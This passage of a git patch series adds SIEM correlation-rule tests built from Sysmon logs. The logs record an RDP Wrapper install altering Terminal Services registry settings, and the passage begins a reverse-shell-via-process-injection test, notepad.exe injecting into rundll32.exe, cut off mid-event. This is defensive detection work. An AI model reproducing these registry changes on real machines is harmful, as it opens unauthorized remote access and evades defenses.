"event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\servicedll", "object.name": "servicedll", "object.new_value": "%%programfiles%%\\rdp wrapper\\rdpwrap.dll", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.260Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:18:05.086Z", "type": "raw", "uuid": "dd0243d2-ccb8-4ca7-911a-4ec0c4bc9dac"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|rdpwinst.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\servicedll", "object.name": "servicedll", "object.new_value": "%%programfiles%%\\rdp wrapper\\rdpwrap.dll", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\termservice\\parameters\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc
new file mode 100644
index 00000000..c4689d4d
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_2.sc
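Review bot: Every test in this commit (test_1 here, and test_2 through test_4 below) is a positive case whose `expect 1` line asserts a single `RDP_settings_tampering` incident, so a regression that widens the rule to every Sysmon event 13 `SetValue` would still pass. A fifth test that feeds an otherwise identical event 13 whose `TargetObject` lies outside the `Terminal Server` / `TermService\Parameters` keys and asserts `expect 0` would pin the key filter; if the rule whitelists any writer process (not visible from the tests), a benign-writer variant with `expect 0` would pin that too. The `# Тут будет твой тест…` line is the generator's placeholder left verbatim in each file; a one-line scenario description would make the tests self-documenting, e.g. `# RDPWInst.exe rewrites TermService ServiceDll to rdpwrap.dll -> one incident expected`. The same placeholder is carried into the ReverseShell_created_via_PEInjection test in the next commit.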
@@ -0,0 +1,4 @@
+{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:18:09.2825936Z\"},\"EventRecordID\":\"5267\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:18:09.272\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ab70-5c8e-0000-0010df1f0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"3700\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\RDPWrap-v1.6.2\\\\RDPWInst.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\"},{\"Name\":\"Details\",\"text\":\"DWORD (0x00000000)\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\fdenytsconnections", "object.name": "fdenytsconnections", "object.new_value": "dword (0x00000000)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.261Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:18:09.272Z", "type": "raw", "uuid": "042a584e-5bfa-4c75-b574-165cf5945c37"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|rdpwinst.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\fdenytsconnections", "object.name": "fdenytsconnections", "object.new_value": "dword (0x00000000)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc
new file mode 100644
index 00000000..3d2f053d
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_3.sc
@@ -0,0 +1,4 @@
+{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:18:09.2825936Z\"},\"EventRecordID\":\"5269\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:18:09.272\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ab70-5c8e-0000-0010df1f0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"3700\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\RDPWrap-v1.6.2\\\\RDPWInst.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Licensing Core\\\\EnableConcurrentSessions\"},{\"Name\":\"Details\",\"text\":\"DWORD (0x00000001)\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\enableconcurrentsessions", "object.name": "enableconcurrentsessions", "object.new_value": "dword (0x00000001)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.262Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:18:09.272Z", "type": "raw", "uuid": "4f326860-a9e1-43a4-9e16-8faa24a004b8"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|rdpwinst.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\enableconcurrentsessions", "object.name": "enableconcurrentsessions", "object.new_value": "dword (0x00000001)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\licensing core\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\rdpwinst.exe", "subject.process.guid": "365abb72-ab70-5c8e-0000-0010df1f0a00", "subject.process.id": "3700", "subject.process.name": "rdpwinst.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\rdpwrap-v1.6.2\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc
new file mode 100644
index 00000000..ec5ae65e
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/RDP_settings_tampering/tests/test_4.sc
@@ -0,0 +1,4 @@
+{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T20:22:59.3997616Z\"},\"EventRecordID\":\"5329\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1852\",\"ThreadID\":\"464\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 20:22:59.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-ac79-5c8e-0000-0010e1b50d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2872\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\regedit.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber\"},{\"Name\":\"Details\",\"text\":\"DWORD (0x00000050)\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\portnumber", "object.name": "portnumber", "object.new_value": "dword (0x00000050)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T13:53:16.262Z", "status": "success", "subject.process.fullpath": "c:\\windows\\regedit.exe", "subject.process.guid": "365abb72-ac79-5c8e-0000-0010e1b50d00", "subject.process.id": "2872", "subject.process.name": "regedit.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T20:22:59.399Z", "type": "raw", "uuid": "b011e315-09fa-46b6-a030-b6deebb3a715"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "RDP_settings_tampering", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "RDP_settings_tampering|pc04.example.corp|regedit.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\portnumber", "object.name": "portnumber", "object.new_value": "dword (0x00000050)", "object.path": "\\registry\\machine\\system\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcp\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\regedit.exe", "subject.process.guid": "365abb72-ac79-5c8e-0000-0010e1b50d00", "subject.process.id": "2872", "subject.process.name": "regedit.exe", "subject.process.path": "c:\\windows\\"}
From 3f12eabfb0f028326cabc9e110ad8db66845d4e5 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:11:30 +0300 Subject: [PATCH 25/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(ReverseShell=5Fcreated?= =?UTF-8?q?=5Fvia=5FPEInjection)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ReverseShell_created_via_PEInjection/tests/test_1.sc | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc
new file mode 100644
index 00000000..f00572e2
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ReverseShell_created_via_PEInjection/tests/test_1.sc
@@ -0,0 +1,6 @@
+{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-07-03T20:39:30.2547335Z\"},\"EventRecordID\":\"8353\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"112\",\"ThreadID\":\"2084\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-07-03 20:39:30.254\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-1256-5d1d-0000-0010fb1a1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"1632\"},{\"Name\":\"SourceThreadId\",\"text\":\"3148\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\notepad.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-1282-5d1d-0000-0010dd401b00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2328\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4530c|C:\\\\Windows\\\\system32\\\\kernel32.dll+51133|C:\\\\Windows\\\\system32\\\\kernel32.dll+5cc37|C:\\\\Windows\\\\system32\\\\kernel32.dll+20ae|UNKNOWN(0053108F)|UNKNOWN(00531147)|UNKNOWN(0054001F)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+63618|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+635eb\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "3148", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4530c|C:\\Windows\\system32\\kernel32.dll+51133|C:\\Windows\\system32\\kernel32.dll+5cc37|C:\\Windows\\system32\\kernel32.dll+20ae|UNKNOWN(0053108F)|UNKNOWN(00531147)|UNKNOWN(0054001F)|C:\\Windows\\SYSTEM32\\ntdll.dll+63618|C:\\Windows\\SYSTEM32\\ntdll.dll+635eb", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "365abb72-1282-5d1d-0000-0010dd401b00", "object.process.id": "2328", "object.process.name": "rundll32.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T15:52:44.702Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\notepad.exe", "subject.process.guid": "365abb72-1256-5d1d-0000-0010fb1a1b00", "subject.process.id": "1632", "subject.process.name": "notepad.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-07-03T20:39:30.254Z", "type": "raw", "uuid": "e4b792cd-d9e2-4367-823e-f9405c1296c3"}
+{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-07-03T20:39:30.2547335Z\"},\"EventRecordID\":\"8352\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"112\",\"ThreadID\":\"2084\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-07-03 20:39:30.254\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1282-5d1d-0000-0010dd401b00}\"},{\"Name\":\"ProcessId\",\"text\":\"2328\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Windows host process (Rundll32)\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"rundll32.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-0a6f-5d1d-0000-0020ca350100}\"},{\"Name\":\"LogonId\",\"text\":\"0x135ca\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-1256-5d1d-0000-0010fb1a1b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1632\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\notepad.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\notepad.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-0a6f-5d1d-0000-0020ca350100", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "79306", "object.process.cmdline": "rundll32.exe", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "365abb72-1282-5d1d-0000-0010dd401b00", "object.process.hash.imphash": "239D911DFA7551A8B735680BC39B2238", "object.process.hash.md5": "C648901695E275C8F2AD04B687A68CE2", "object.process.hash.sha1": "892503B20247B341CFD20DDA5FDACFA41527A087", "object.process.hash.sha256": "3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670", "object.process.id": "2328", "object.process.meta": "Description:Windows host process (Rundll32) | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "rundll32.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\notepad.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.parent.guid": "365abb72-1256-5d1d-0000-0010fb1a1b00", "object.process.parent.id": "1632", "object.process.parent.name": "notepad.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T15:52:44.707Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79306", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-07-03T20:39:30.254Z", "type": "raw", "uuid": "71d38006-b76d-499a-86a8-2c442e84fdbb"}
+{"action": "detect", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"3\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"3\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-07-03T20:39:31.7078585Z\"},\"EventRecordID\":\"8354\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"112\",\"ThreadID\":\"2096\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-07-03 